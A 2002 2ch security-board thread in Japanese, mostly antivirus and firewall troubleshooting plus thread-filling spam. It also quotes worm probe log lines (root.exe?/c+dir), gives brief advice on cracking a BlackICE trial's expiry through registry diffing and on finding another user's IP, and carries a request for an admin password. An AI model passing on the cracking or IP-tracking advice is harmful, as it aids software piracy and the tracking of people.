888 :名無しさん@お腹いっぱい。:02/02/07 23:33
>>887
たまに受信できないことあったよ。ノートンのPOPサーバ(?)が落ちてるっぽい。
NIS2002だと方法がちがうので大丈夫なんだけど。

889 :cheshire-cat:02/02/07 23:36
>>887
2001だよね、バージョン。
なら手動で、「pop3.norton.antivirus」に変更してみたらどうかな。
あ、受信メールサーバーアカウントは、変更しなくてもいい。

890 :名無しさん@お腹いっぱい。:02/02/07 23:48
>>889
変更はメールの方ですよね、
エラーになってしまいました・・。

891 :名無しさん@お腹いっぱい。:02/02/07 23:52
スミマセン!サーバの方書き換えてました
アカウント変えたら通じました!
丁寧に教えてくださってありがとうございました!!!

892 :891:02/02/07 23:59
・・・・すみません違ってました
またセキュリティのチェックが外れていました。
やっぱり受信してもらえなかったです・・・。


893 :cheshire-cat:02/02/08 00:14
>>891
<メーラーの設定を>
受信メール(POP3):pop3.norton.antivirus
送信メール(SMTP):プロバの設定どおり
受信メールサーバー アカウント名:プロバの設定どおり

メーラーはまさか、Nortonが未対応のものじゃないよね?

手元に今無いんで、明日職場でどうなってるのか見てくる。
もう寝るけど、Norton Personal Firewallはどうなってるのか書いて欲しい。
それじゃ。

894 :名無しさん@お腹いっぱい。:02/02/08 00:19
明日になればつながる しばし待たれよ

895 :cheshire-cat:02/02/08 00:23
すまん、一つ間違い
アカウント名 : (ユーザーアカウント) → (ユーザーアカウント)/(サーバーのアドレス)

ちなみに、これをどうぞ
http://service2.symantec.co.jp/consumer/support-kb.nsf/KBLPF/43C342A6F3C7C5ED49256AFF005CF12A?OpenDocument&PRODUCT=Norton%20AntiVirus2001

896 :891:02/02/08 03:57
>>cheshire-cat さん

昨日、上記の方法でやってみたのですが、ダメだったので
最初言いってた「ファイアーウォールでメールが弾かれてる」って
現象の可能性もあったので
思いきってネットセキュリティを全部消して
また新しくインストールして、設定も慎重にしました、
今度は間違いなく開通しました!!
やっぱり弾いてたみたいです。

大変お騒がせいたしました・・・。
度々アドバイスして下さって嬉しかったです。
丁寧に教えて下さって本当にありがとうございました!!!


897 :名無しさん@お腹いっぱい。:02/02/08 04:09
質問です!
hotメールのメッセンジャーか、メールアドレスを使って、IP抜く方法ってありますか?
それと、某HPの運営者を調べたい時は、どうやってどの程度まで分かるものなんでしょうか?
マジレスでお願いします。。。

898 :名無しさん@お腹いっぱい。:02/02/08 04:24
>>897
メッセンジャー → P2Pで繋げる → netstat -a
メールアドレス → ヘッダー情報を見る
HPの運営者→わからん

あとは自分で調べれ

899 :名無しさん@お腹いっぱい。:02/02/08 07:04
このアフォスレ↓さすがに、もう誰も相手しなくなったな…
http://pc.2ch.net/test/read.cgi/sec/1012594235/l50

900 :名無しさん@お腹いっぱい。:02/02/08 08:13
Outpost part2と同じ奴じゃねーの?
アフォと言うより一人で盛り上がってるだけだから放置でよろしかろう
周りにウィルス撒き散らす前に初級に帰ってもらいたいところだが

901 :名無しさん@お腹いっぱい。:02/02/08 11:33
win2kなんですけども、お薦めのIDSがあったら教えてください。

902 :poko:02/02/08 16:04
BlackICEの体験版をクラックしたいんですけど、使用期限のレジストリってどこにありますか?
お願いします。

903 :名無しさん@お腹いっぱい。:02/02/08 17:32
それにしても、民族差別的言辞に与するつもりは全くないのですが
管理を任されている各所のサーバに来てる「winnt/system32/cmd.exe」
系のアクセスって、ほぼすべてkrnic配下からなんですよね。
 あまりにひどいんで、とりあえず日本国内からしかアクセスがない
ことがわかってるサーバに関しては、krnic配下とcnnic配下のIPからの
アクセスはすべてnegoを途中でうち切るようにしてしまいました。
 これで向こうが気づいてくれればよいのですが。

 CodeRedとか食らうのはMicro$oftがタコなせいだから、まぁしかたが
ないにしても、下手な英語で注意のメールうっても無視されてしまうのが
つらいところです、欧米のサーバだと大抵「気をつけます」程度のメール
は帰ってくるのですが・・・。


↑を説明してくれ、住人さん。今2chが大変な事になってるよ〜。

904 :名無しさん@お腹いっぱい。:02/02/08 17:36
>>902
1.体験版のレジストリ情報をかたっぱしから保存する。
2.製品版を買ってアップデートインストールする。
3.レジストリ調べる。変化した部分がハッキングポイントだ。

さあ頑張ってくれ。

905 :名無しさん@お腹いっぱい。:02/02/08 17:44
>>903
説明してくれったって、実際そこに書いてあるとおりだが。。。

>今2chが大変な事になってるよ〜。
この糞重い2ch鯖は、そのせいなのか?

906 :名無しさん@お腹いっぱい。:02/02/08 18:09
メールの内容が全部消えてなくなった!
ウイルス?

907 :死ねロータス!:02/02/08 18:13
domino.opro.net ロータスドミノHELP Server 逝ってます。
NimdaかCodeREDか忘れるくらい懐かしい。今どきなんだ・?
どっちだっけ?これって。
domino.opro.net - - [08/Feb/2002:10:46:55 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
domino.opro.net - - [08/Feb/2002:10:46:55 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
domino.opro.net - - [08/Feb/2002:10:46:56 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
domino.opro.net - - [08/Feb/2002:10:46:56 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"



908 :緊急名無しさん:02/02/08 20:21
私がよく見てるHP(エンドレスバトルって言うオンラインゲーム)のBBSに、
何か荒らしみたいのがいるんですけど、
そいつがアドレスを載せてきました。
で、最後にmonster/hash.dataって書いてあるんです。
hashって意味を調べたら、make a hash ofでメチャメチャにするとか言う意味だし、
これ見ないほうがいいですよね・・・?


909 :名無しさん@お腹いっぱい。:02/02/08 20:25
いや、データって付いてるしただのハッシュリストじゃないのか?
モンスターに関するデータリストだろ。何の価値があるのか知らんが。

910 :名無しさん@お腹いっぱい。:02/02/09 03:11
http://autoshow.path.ne.jp/
『くるまえらびのJapan Motor Show』
      ↑
これっていわゆるハックされた状態なんでしょうか?
既出ならスマソ

911 :名無しさん@お腹いっぱい。:02/02/09 04:13
ここ最近の2ch鯖落ちについてどう御考えでしょうか?
やはりアタックでしょうか?

912 :名無しさん@お腹いっぱい。:02/02/09 04:52
CISSPっていうセキュリティの資格があるけど
これは海外だと評価高いらしいですね。
で、こういう資格を有する人達のレベルってどんなもんなの?

913 :しゃちょ:02/02/09 05:30
http://life.2ch.net/test/read.cgi/yuusen/1013095007/
ぜんぜんネットじゃないんですけど
セキュリティーに関する事に精通している方々ならなにか良い知恵をいただけないかと思い…
おねがいします。

914 :名無しさん@お腹いっぱい。:02/02/09 06:17
質問だけど、ぞね見たいなフリーのアンチウイルス祖父とあるんですか?

915 : :02/02/09 08:53
>>914
あるよ、AVGとか。スレでアンチウイルス系のをみていくと
いくつかみつかるはず。

916 :poko:02/02/09 12:55
>>904
レスどうもありがとうですです。

917 :名無しさん@お腹いっぱい。:02/02/09 14:49
昨日ADSL8Mが開通し、ウィルスソフトも兼ねてNISを今日買いに行こうと思ってるのですけど、速度落ちちゃいますか?今6M位出てます。
あとWinXPなんですけど重かったりしますか?

もしNISがこの環境にあわなければ何買えばいいでしょう。
ウイルスバスターのFWは守られてる気がしなくて。
今ウイルスバスター体験版使用中。Meの時はノートンのFW使ってました

918 :もも香:02/02/09 15:01
ウイルスバスターをインストールしたいのですが、
インストールしようとすると
「McAfee VirusScanをアンインストールしてからにしてください。」
という表示が出ます。
検索で探してもこのMcAfee VirusScanが出てこないのですが
検索の仕方がいけないのでしょうか。。。
どなたか教えてください。

919 :ネット屋 ◆.t4dJfuU :02/02/09 15:42
>>918 スタートボタン→コントロールパネル→アプリケーションの追加と削除→McAfeeをクリックして削除

920 :名無しさん@お腹いっぱい。:02/02/09 15:44
トロイの駆除方法おしえれ。
駆除ソフトが感知しないローカルなウィルスかもしれん

どーすんだ?いろいろ教えれ

921 :ネット屋 ◆.t4dJfuU :02/02/09 15:47
>>920
http://security2.norton.com/ssc/lunavbrk.asp?scantype=2&langid=jp&venid=sym&plfid=20&pkj=DDSKYJDMVVOOAOMMUZY
これまずやってみそ?

922 :名無しさん@お腹いっぱい。:02/02/09 15:49
>>921
どうもです。

923 :名無しさん@お腹いっぱい。:02/02/09 15:56
http://ffdqsaga.mods.jp/cgi/exit/exit.cgi
ここの管理用のパスワードを知りたいのですがみなさん協力してくれませんか?
ここの管理人は14歳の厨房なので、通報とかできないと思いますけど。

924 :名無しさん@お腹いっぱい。:02/02/09 16:05
>>921
検出されなかったよ。

925 :名無しさん@お腹いっぱい。:02/02/09 17:10
>>910
ほんとだね されちゃってるね (ワラワラ

>>911
らしいね。どっかの韓国サイトに攻撃対象として上げられてた。

926 :名無しさん@お腹いっぱい。:02/02/09 17:18
リモートホスト等のログから
その形跡から道をたどってプロバイダやHPを見つけることは出来ますか?


927 :finger79:02/02/09 17:23
>>926
形跡たどるっていうか、リモホからプロバイダ分かるでしょ。
HPってのはその人のHP?それは分からん(プロバイダによっては分かるとこもあるかも)

928 :ネット屋 ◆.t4dJfuU :02/02/09 17:23
>>924 なぜウィルスに感染したと思いしたか?

929 :名無しさん@お腹いっぱい。:02/02/09 18:35
>>925
> らしいね。どっかの韓国サイトに攻撃対象として上げられてた。

だから、それは2ちゃんねらーの自作自演。

ただ、攻撃だとしたら、SYN floodアタックあたりが考えられるんだけど、
ここの住人としては、どうよ?

930 :名無しさん@お腹いっぱい。:02/02/10 12:22
ノートンアンチウィルス2002をXPで使用しています。

ウィルスチェックを「システム起動時」にスケジュールしているの
ですが、スケジュール通りにチェックしません。
1日単位で時間を指定してのスケジュールはうまくいきます。

なにか設定がわるいのでしょうか。
心当たりがあればご教授ください。


931 :名無しさん@お腹いっぱい。:02/02/10 14:27
 先日、ウイルスで80GByte飛ばした^^;;
ついでに、ソラリスのインストールに失敗して30GByteも、、、

ノートPCと、ルーターのFreebsd(NAT箱)生きてるからいいけど。

FAT32の ファイルアロケーションテーブルのCOPY数っていくつだったかなぁ、、
とか考えつつ、あきらめました。


ウイルス対策ソフトもあてにならんね。


932 :名無しさん@お腹いっぱい。:02/02/10 20:23
今度からここはほんとの雑談スレにしない?
質問スレは2つあるし。

>>931
MXで飛ばしたなら話は別だぞ(w

933 :名無しさん@お腹いっぱい。:02/02/11 03:05
>>932
同感。各スレに関する雑談とかも…。

http://pc.2ch.net/test/read.cgi/sec/1012594235/l50
↑このアフォーなスレ、飽きもせずまだやってるな。

934 :名無しさん@お腹いっぱい。:02/02/11 03:20
ちょっとスレタイトルが分かりにくい。
次スレではもっとスマートなタイトルをキボンヌ

雑談スレでね

935 :名無しさん@お腹いっぱい。:02/02/11 04:10
シンプルに

●セキュ板 雑談スレ●

で良い!!

936 :名無しさん@お腹いっぱい。:02/02/11 16:24


937 :932:02/02/11 20:37
●セキュ板 雑談スレッド●[4]
http://pc.2ch.net/test/read.cgi/sec/1013427349/

>>932-935
こんな感じで立ててみたけど。
とりあえず、雑談用に使ってください。

938 :937=931:02/02/11 20:38
937は931でした。スマソ

939 :あほーBBから執拗に宣伝を書き込んでいます:02/02/12 01:48
あほーBBから執拗に宣伝を書き込んでいます。

うぃ 名前: テリオス [2002/02/11,16:31:12]
下のリンクはとっとこハム太郎が大嫌いな人だけが見れます。
http//urume.cool.ne.jp/ug/ugzonetop.html http//urume.cool.ne.jp/
下のリンクは、お金が欲しいガメツイ方だけが見れます。
http//urume.cool.ne.jp/ http//urume.cool.ne.jp/
良質画像だけを載せている 画像倉庫
http//urume.cool.ne.jp/av/http//urume.cool.ne.jp/av/

218.115.164.
inetnum:218.112.0.0 - 218.143.255.255
netname:BBTECH descr:BB Technology Corp.
person:Takeshi Tsutsui
address:Nihonbashi Hakozaki bldg.
address:24-1,Nihonbashi Hakozaki-Cho
Chuo-ku,Tokyo,103-0015,Japan
stsuruma@softbank.co.jp


940 :1000!!!!!!取り合戦開始!:02/02/12 01:52
まもなくここは 乂1000取り合戦場乂 となります。

      \∧_ヘ     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!!       ,,、,、,,,
    /三√ ゚Д゚) /   \____________  ,,、,、,,,
     /三/| ゚U゚|\      ,,、,、,,,                       ,,、,、,,,
 ,,、,、,,, U (:::::::::::)  ,,、,、,,,         \オーーーーーーーッ!!/
      //三/|三|\     ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ∪  ∪       (    )    (     )   (    )    )
 ,,、,、,,,       ,,、,、,,,  ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ,,、,、,,,       (    )    (    )    (    )    (    )


941 :名無しさん@お腹いっぱい。:02/02/12 03:18
セキュリチ板に1000取り合戦などない!!

なぜなら人がいないからだ!!

分かったか!!

940ゲットー!!

とかもない!!

942 :名無しさん@お腹いっぱい。:02/02/13 23:29
アドビはなんでフォトデラックス3.1の修正パッチを出さないんですか?

943 :名無しさん@お腹いっぱい。:02/02/13 23:35
>>941
でも、良い板だよねぇ。
アフォが少ないし。スキルある人多いし。

944 :埋め立て屋:02/02/20 14:14
●セキュ板 雑談スレッド●[4]
http://pc.2ch.net/test/read.cgi/sec/1013427349/

945 : :02/03/02 18:48
パソコンに急に人の顔が出てきて
怖いんですがこれはウィルスでしょうか?
もし知ってる人がいたら教えてください

946 :名無しさん@お腹いっぱい。:02/03/02 18:53
>>945
http://member.nifty.ne.jp/hirotti/gaisyutsuf2.htm#kyofu

947 :  :02/03/02 19:06
ありがとうございます
やってみます

948 :cheshire-cat:02/03/02 21:56
さっきハックラ板に書き込んでいる時に気付いたんだけど。

PFWでNetBusをブロックしたという書き込みがあるとするよね。
インバウンドかアウトかを確認せずに、「安心だよ」、ってレス付けるのって、危険かな?
もし本当に入っていて、それを遮断したんだったら嫌だな。

949 :名無しさん@お腹いっぱい。:02/03/03 00:07
>>948
そうだね。
大抵(っていうか99%?)はINをブロックしたんだと思うけど、
OUTをブロックしたとするとすでに感染済みってことになるもんね(誤検出もあるかぁ)

※ところでこのスレって過去スレではないの? 活用ですか?w

●セキュ板 雑談スレッド●[4]
http://pc.2ch.net/test/read.cgi/sec/1013427349/

950 :名無しさん@お腹いっぱい。:02/03/03 04:54
>>948
NetBusのサーバーモジュールってアウトバウンドで通信したっけ?
ポートを開く(Listening)だけだったような気がするんだけど…。
クライアントの方は、ユーザが知ってて実行するんだし
問題ないように思うんだけど?

951 :名無しさん@お腹いっぱい。:02/03/03 04:55
あ、でもNetBusのデフォルトポート使う別のヤツかも知れんなぁ…

952 :名無しさん@お腹いっぱい。:02/03/03 05:10
>>950
key loggerでSMTP使わない?
IPアドレスの方はどうか忘れたけど。

かなり記憶があやふやだから、間違ってるかも。

953 :名無しさん@お腹いっぱい。:02/03/04 18:59
>>952
どうだろう?
それはNetBusじゃなくてSubSevenだったような?ちょっと自信なし。
まぁSMTP送信なら、わざわざデフォルトのポート12345なんて使わないよね。

それはそうとNetBusって2.0からはトロイじゃなくて
まっとうな商業ソフトとしてリリースされてるんだね〜。ん?ちがう?

954 :名無しさん@お腹いっぱい。:02/03/04 20:44
IE5.5/6.0に任意のプログラムが実行できるセキュリティーホール。
わいはWIN2K+IE5.01SP2+パッチなので影響なし。
でもスクロールバーの色変わるの経験無し…
みてぇ


955 :cheshire-cat:02/03/04 20:56
トロイって最近扱ってないんで、記憶あいまいなんだけど。
Listeningだけだったっけ?覚えていないっす。
んじゃ、netstatで検出できても、起動後にはPFWで(トロイピン捨てるなら)アウトバウンド検出できないのかな。
はて。。。?

ネタ振った責任として、週末に感染させて実験します。

956 :cheshire-cat:02/03/04 20:58
今持ってるクライアント、SubSevenとNetBusとMTXしかないんだけど。
他に何かない?

957 :名無しさん@お腹いっぱい。:02/03/05 00:42
>>949
どーせ あと40もレスすればdat落ちするんだから
再利用しておきましょう

958 :名無しさん@お腹いっぱい。:02/03/10 14:24
 

959 :埋め立て屋:02/03/12 09:51
●セキュ板 雑談スレッド●[4]
http://pc.2ch.net/test/read.cgi/sec/1013427349/l50

960 :埋め立て屋:02/03/12 09:51
 

961 :埋め立て屋:02/03/12 09:51
  

962 :埋め立て屋:02/03/12 09:51
   

963 :埋め立て屋:02/03/12 09:51
    

964 :埋め立て屋:02/03/12 09:51
     

965 :埋め立て屋:02/03/12 09:51
      

966 :埋め立て屋:02/03/12 09:51
       

967 :埋め立て屋:02/03/12 09:51
        

968 :埋め立て屋:02/03/12 10:10
 

969 :埋め立て屋:02/03/12 10:10
  

970 :埋め立て屋:02/03/12 10:10
   

971 :埋め立て屋:02/03/12 10:10
    

972 :埋め立て屋:02/03/12 10:10
     

973 :埋め立て屋:02/03/12 10:10
●セキュ板 雑談スレッド●[4]
http://pc.2ch.net/test/read.cgi/sec/1013427349/l50

974 :埋め立て屋:02/03/12 10:10
       

975 :埋め立て屋:02/03/12 10:10
         

976 :埋め立て屋:02/03/12 10:18
 

977 :埋め立て屋:02/03/12 10:18
  

978 :埋め立て屋:02/03/12 10:18
   

979 :埋め立て屋:02/03/12 10:18
    

980 :埋め立て屋:02/03/12 10:18
     

981 :埋め立て屋:02/03/12 10:18
       

982 :埋め立て屋:02/03/12 10:18
      

983 :埋め立て屋:02/03/12 10:18
        

984 :埋め立て屋:02/03/12 10:18
          

985 :埋め立て屋:02/03/12 10:19
 

986 :埋め立て屋:02/03/12 10:19
  

987 :埋め立て屋:02/03/12 10:19
   

988 :埋め立て屋:02/03/12 10:19
    

989 :埋め立て屋:02/03/12 10:19
     

990 :埋め立て屋:02/03/12 10:19
      

991 :埋め立て屋:02/03/12 10:20
       

992 :埋め立て屋:02/03/12 10:20
         

993 :埋め立て屋:02/03/12 10:20
          

994 :埋め立て屋:02/03/12 10:27
 

995 :埋め立て屋:02/03/12 10:27
         

996 :埋め立て屋:02/03/12 10:27
        

997 :埋め立て屋:02/03/12 10:27
       

998 :埋め立て屋:02/03/12 10:28
●セキュ板 雑談スレッド●[4]
http://pc.2ch.net/test/read.cgi/sec/1013427349/l50

999 :埋め立て屋:02/03/12 10:28
999ゲト

1000 :埋め立て屋 ◆Liz4zQaI :02/03/12 10:28
1000です。。。


1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

276 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)